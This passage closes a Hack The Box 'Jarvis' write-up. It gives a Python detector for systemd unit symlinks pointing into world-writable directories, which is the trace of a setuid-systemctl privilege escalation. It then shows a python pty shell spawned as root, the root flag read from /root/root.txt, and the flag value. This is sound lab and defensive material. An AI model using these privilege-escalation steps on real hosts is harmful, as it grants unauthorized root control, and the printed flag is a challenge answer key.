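The root cause here is the setuid bit on /bin/systemctl (mode -rwsr-x--- above), and the find command in step 18 is the audit that catches it. A second, complementary check is on the artefact the technique leaves behind: systemd unit symlinks that resolve into a world-writable directory such as /dev/shm. The following is an added detection example, not code from the page: it flags unit links whose target lies outside the normal unit directories, run here over constructed (link, target) pairs mirroring the symlinks created above, with a walker for use on a live host.

```python
import os

# Directories where legitimate unit files normally live.
TRUSTED_UNIT_DIRS = (
    "/etc/systemd/system",
    "/lib/systemd/system",
    "/usr/lib/systemd/system",
    "/run/systemd/system",
)
# Locations any local user can write to; a unit resolved here is a red flag.
WORLD_WRITABLE_PREFIXES = ("/dev/shm", "/tmp", "/var/tmp", "/home")


def _under(path, prefix):
    return path == prefix or path.startswith(prefix + "/")


def is_suspicious_target(target: str) -> bool:
    """True if a unit's real location is user-writable or outside the trusted dirs."""
    target = os.path.normpath(target)
    if any(_under(target, p) for p in WORLD_WRITABLE_PREFIXES):
        return True
    return not any(_under(target, d) for d in TRUSTED_UNIT_DIRS)


def suspicious_unit_links(links):
    """links: iterable of (symlink_path, resolved_target). Returns the suspicious ones."""
    return [(link, target) for link, target in links if is_suspicious_target(target)]


def collect_unit_links(root="/etc/systemd/system"):
    """Walk a live host for unit symlinks and resolve them. Returns (link, target) pairs;
    an absent root simply yields an empty list."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                found.append((path, os.path.realpath(path)))
    return found


# Constructed sample: the two symlinks created on the page plus ordinary ones.
SAMPLE_LINKS = [
    ("/etc/systemd/system/srmeirins.service", "/dev/shm/srmeirins.service"),
    ("/etc/systemd/system/multi-user.target.wants/srmeirins.service", "/dev/shm/srmeirins.service"),
    ("/etc/systemd/system/multi-user.target.wants/ssh.service", "/lib/systemd/system/ssh.service"),
    ("/etc/systemd/system/sshd.service", "/lib/systemd/system/ssh.service"),
]


if __name__ == "__main__":
    for link, target in suspicious_unit_links(SAMPLE_LINKS):
        print(f"SUSPICIOUS {link} -> {target}")
    for link, target in suspicious_unit_links(collect_unit_links()):
        print(f"LIVE HOST  {link} -> {target}")
```

On a host where units are expected under an additional path (a vendor directory under /opt, for instance), add it to TRUSTED_UNIT_DIRS rather than loosening the world-writable check; the latter is the signal that matters.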

21. Read the root flag

python3 -c 'import pty;pty.spawn("/bin/bash")'
root@jarvis:/#

root@jarvis:/# cat /root/root.txt
cat /root/root.txt
9ebe5b67311067357584f21ccf1641f2
root@jarvis:/#

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/194


https://sh1yan.top/2024/01/08/Jarvis-htb-writeup/
Author: shiyan
Published: 8 January 2024